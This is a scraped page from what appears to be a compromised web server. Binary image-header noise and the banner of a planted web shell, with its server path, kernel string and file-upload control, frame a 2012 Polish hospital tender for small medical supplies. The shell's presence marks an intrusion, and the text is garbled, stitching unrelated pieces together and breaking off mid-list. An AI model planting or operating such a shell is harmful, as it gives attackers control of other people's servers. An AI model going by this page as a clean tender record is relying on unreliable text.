JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120131/29064-N-2012.html

<p class="kh_header"><b>Włocławek: DIZ-6-2012
Dostawa drobnego sprzętu medycznego</b><br>
<b>Numer ogłoszenia: 29064 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ-6-2012
Dostawa drobnego sprzętu medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu  zamówienia.
1.	Przedmiotem zamówienia jest dostawa drobnego sprzętu medycznego opisanego poniżej:

Zadanie 1 Ostrza do strzygarki
l.p.	Nazwa asortymentu	Rozmiar - model	Ilość szt. na 2 lata
a.	Ostrza do strzygarki z ruchomą główką		szt. 3600
b.	Ostrza do strzygarki bez ruchomej główki		

Zadanie 2 Sprzęt do golenia
l.p.	Nazwa asortymentu	Rozmiar - model	Ilość szt. na 2 lata
a.	 Golarka medyczna		szt. 9600
b.	Maszynka do golenia jednorazowego użytku		szt. 6000

Zadanie 3 Różny drobny sprzęt
l.p.	Nazwa asortymentu	Rozmiar - model	Ilość szt.-op. 
na 2 lata
a.	Precyzyjny regulator przepływu		szt. 2400
b.	Strzykawka do pompy typ Graseby 3150 firmy Smith Medical	50ml/60ml	szt. 9600
c.	Igła do nakłucia lędźwiowego	18G  x  88-90mm	szt. 600
		20G  x  88-90mm	szt. 600
		22G x 50mm	szt. 480
		22G x 90mm	szt. 240
		26G x 90mm	szt. 240
d.	Żel do usg	Opakowanie 500g	op. 2400
e.	Igła do rozpuszczania i pobierania  leków 
op. x 100 szt	
18G x 30mm	op. 3840
f.	Ostrza do skalpela op. x 100szt.	10	op. 48
		11	op. 48
		15	op. 48
		16	op. 48
		18	op. 48
		20	op. 48
		22	   op. 192

Zadanie 4   Zestaw do przetoki nerkowej
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.	Nefrofix - zestaw do przez skórnej przetoki nerkowej	8Ch	szt. 240
		11Ch	szt. 240

Zadanie 5   Wkłady do zamkniętego usuwania odessanych substancji
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.	Wkłady jednorazowego użytku do zamkniętego i bezpiecznego usuwania odessanych substancji
+  pojemnik wielorazowy do ww. wkładów  w ramach zamówienia wkładów	1 litr, 2 litry,  3 litry	szt.  4800
		1 litr, 2 litry,  3 litry	szt. 60
b.	Torba na wymiociny		szt.  1200

Zadanie 6   Dreny różne,  worki
l.p.	Nazwa asortymentu	Rozmiar - model	Ilość szt. na 2 lata 
a.	Zestaw drenów do drenażu  jamy opłucnej - dreny do drenażu jedno i dwu butlowego 	1 - butlowy	szt. 192
		2 - butlowy	szt. 96
b.	Worek do godzinowej zbiórki moczu		szt. 1200
c.	Sterylny zestaw do odsysania z pola operacyjnego typu Yanakuar	Dł. drenu 200 mm, 300 mm
Śr. wew. 5 mm, 7-8 mm, 10 mm	szt. 3600
d.	Jałowy dren łączący do odsysania pola operacyjnego	5mm x 200 cm
5mm x 300 cm
7mm x 200 cm
7 mm x 300 cm	
szt. 4992
e.	Dren balonowy do podawania tlenu - jałowy o średnicy  3 mm	Długość drenu - 180 cm	szt. 3600
	Długość drenu - 300 cm	szt. 2400
f.	Maski do podawania tlenu jednorazowego użytku	z drenem	szt. 3600
		bez drenu	szt. 2400
g.	Dren do ssaka niejałowy	9mm x 5mm x 1500 mm	szt. 7200
h.	Przedłużacz do przewodów oddechowych		szt. 3840
i.	Worek na  mocz w systemie zamkniętym		szt. 1440

Zadanie 7   Zestaw do gastrostomii
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.	Flocare PEG - zestaw do przez skórnej endoskopowej gastrostomii	
18 mm dł. 40cm	
szt. 432
b.	Zgłębnik gastrostomijny Flocare G- tube	18	szt. 48
		20	szt. 24

Zadanie 8   Zgłębnik gastrostomijny 
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.	Zgłębnik gastrostomijny Flocare G- tube	16	szt. 24
		22	szt. 24

Zadanie 9   Mocowanie do rurek 
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.	Mocowanie do rurek intubacyjnych 		szt. 1440
b.	Mocowanie do rurek tracheotomijnych		szt. 3600

Zadanie 10   Myjka jednorazowa do mycia ciała pacjentów
l.p.	Nazwa asortymentu	Rozmiar - model	Ilość szt. na 2 lata 
a.	Myjka jednorazowa do mycia ciała pacjentów 		szt. 14400.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o  których mowa w  art. 67 ust. 1 pkt  7  ustawy prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w tym postępowaniu nie będzie wymagał od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące :
1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Celem potwierdzenia spełnienia tego warunku  Zamawiający żąda  następujących dokumentów:

a. koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek ich posiadania na podjecie  działalności  gospodarczej w zakresie objętym zamówieniem;


Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem potwierdzenia spełnienia tego warunku Zamawiający żąda złożenia następujących dokumentów:
a.wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw drobnego sprzętu medycznego w zakresie objętym przedmiotem zamówienia w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz z załączeniem dokumentu  potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie- co najmniej 3 dostawy za   łączną wartość brutto 100 000,00 zł:  zgodnie  z Załącznikiem nr 6  do niniejszej   specyfikacji;

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem potwierdzenia spełnienia tego warunku  Zamawiający żąda złożenia następujących dokumentów:
a. pisemne oświadczenie, że Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami  zdolnymi do wykonania zamówienia;

b. w przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, Wykonawca zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi  do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na  okres korzystania z nich przy wykonaniu zamówienia.

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. pisemne oświadczenie, że Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami  zdolnymi do wykonania zamówienia;

b. w przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, Wykonawca  zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na  okres korzystania z  nich przy wykonaniu zamówienia.

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4. Celem potwierdzenia tego warunku Zamawiający żąda  złożenia   następujących dokumentów:
a. pisemne oświadczenie, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  deliktowej i kontraktowej w zakresie wykonywanej działalności gospodarczej.

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">6.  Celem potwierdzenia, że oferowana dostawa odpowiada opisowi przedmiotu 
      zamówienia   Zamawiający żąda:
a. Wszystkie dostarczone artykuły muszą spełniać wymogi ustawy z dnia 20   maja  2010r. o wyrobach medycznych  ( Dz. U. nr 107, poz. 679 ), tzn.   Wykonawca winien  przedstawić jeden z dokumentów dotyczących wyrobu:
-deklarację zgodności i oznaczenie znakiem zgodności CE,
-świadectwo rejestracji lub świadectwo dopuszczenia do obrotu 
-świadectwo jakości lub też świadectwo dopuszczenia do stosowania 
-pozytywną opinię o wyrobie medycznym.
b. folder handlowy
c. W celu określenia przydatności asortymentu do użycia oraz celem obiektywnego  i  równego traktowania podmiotów,  Wykonawca zobowiązany jest  bezpłatnie  dostarczyć  próbki oferowanego  asortymentu z   ważnym terminem  przydatności  do zużycia (co najmniej 6 m-cy).
Wymagana  ilość  próbek określona jest w formularzu asortymentowo-cenowym.
Każdy oferowany asortyment musi posiadać  opis w języku  polskim.
Próbki należy dostarczyć w dniu otwarcia ofert na adres:
Szpital  Wojewódzki , ul.  Wieniecka  49,87- 800  Włocławek, Zamówienia Publiczne, pokój 303.

 Dostarczone próbki winny być umieszczone w odrębnym od Oferty opakowaniu i  odpowiednio oznaczone: PRÓBKI do przetargu DIZ-6-2012 na dostawę drobnego sprzętu medycznego Zadanie.....  
Do Oferty należy dołączyć protokół ilości dostarczonych próbek.

Próbki są materiałem zużywalnym, dlatego też nie podlegają zwrotowi.

 Wszystkie dokumenty muszą być złożone w oryginale lub w kserokopii   poświadczonej   za zgodność z oryginałem przez osobę uprawnioną do podpisania  oferty.  

7. Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest do  złożenia niżej   wymienionych dokumentów:

a. wypełniony i podpisany Druk ofertowy, zgodnie z  Załącznikiem nr 1 oraz Formularz asortymentowo-cenowy, zgodnie  z Załącznikami nr 1.1.-1.10. do niniejszej  specyfikacji;
b. oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 2 do  niniejszej specyfikacji;
c. oświadczenie o zapoznaniu się z niektórymi przepisami, zgodnie z Załącznikiem nr 3 do niniejszej specyfikacji;
d. oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia, zgodnie z  Załącznikiem nr 4 ;
e. zaakceptowany i podpisany projekt umowy stanowiący Załącznik nr 5 do niniejszej  specyfikacji;
f. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów rejestracyjnych) w  przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych ;  

Wszystkie dokumenty muszą być złożone w oryginale lub w postaci kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty.
Jeżeli wykonawca składa dokumenty stanowiące tajemnicę firmy w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji, winny być opatrzone napisem  TAJNE. W tym celu należy również wypełnić Załącznik nr 7 do niniejszej specyfikacji.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - jakość - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany umowy w postaci aneksu w przypadku kiedy zmiana ta będzie korzystna dla zamawiającego lub gdyby zamawiający miał ponieść niewspółmierną stratę przez zaniechanie zmiany. 
 Zamawiający przewiduje również zgodnie z art. 144 ustawy Prawo zamówień publicznych możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy (w formie aneksu), w przypadku  wystąpienia  co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków  ich wprowadzenia: 
1)  zmiany spowodowane siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy;   
2) ustawowa zmiana obowiązującej stawki podatku od towarów i usług (VAT).
     Wszystkie powyższe postanowienia w podpunktach stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki,  ul. Wieniecka 49, 87-800 Włocławek,
pokój 303 (budynek  administracji, pokój 303).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2012 godzina 10:00, miejsce: Szpital Wojewódzki,  ul. Wieniecka 49, 87-800 Włocławek,
pokój 303 (budynek  administracji, pokój 303).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 Ostrza do strzygarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 Ostrza do strzygarki
a.Ostrza do strzygarki z ruchomą główką		szt. 3600
b.Ostrza do strzygarki bez ruchomej główki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 Sprzęt do golenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 Sprzęt do golenia
l.p.	Nazwa asortymentu	Rozmiar - model	Ilość szt. na 2 lata
a.Golarka medyczna		szt. 9600
b.Maszynka do golenia jednorazowego użytku		szt. 6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 Różny drobny sprzęt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 Różny drobny sprzęt
l.p.	Nazwa asortymentu	Rozmiar - model	Ilość szt.-op. 
na 2 lata
a.Precyzyjny regulator przepływu		szt. 2400
b.Strzykawka do pompy typ Graseby 3150 firmy Smith Medical	50ml/60ml	szt. 9600
c.Igła do nakłucia lędźwiowego	
18G  x  88-90mm	szt. 600
20G  x  88-90mm	szt. 600
22G x 50mm	szt. 480
22G x 90mm	szt. 240
26G x 90mm	szt. 240
d.Żel do usg	Opakowanie 500g	op. 2400
e.Igła do rozpuszczania i pobierania  leków op. x 100 szt	
18G x 30mm	op. 3840
f.Ostrza do skalpela op. x 100szt.	
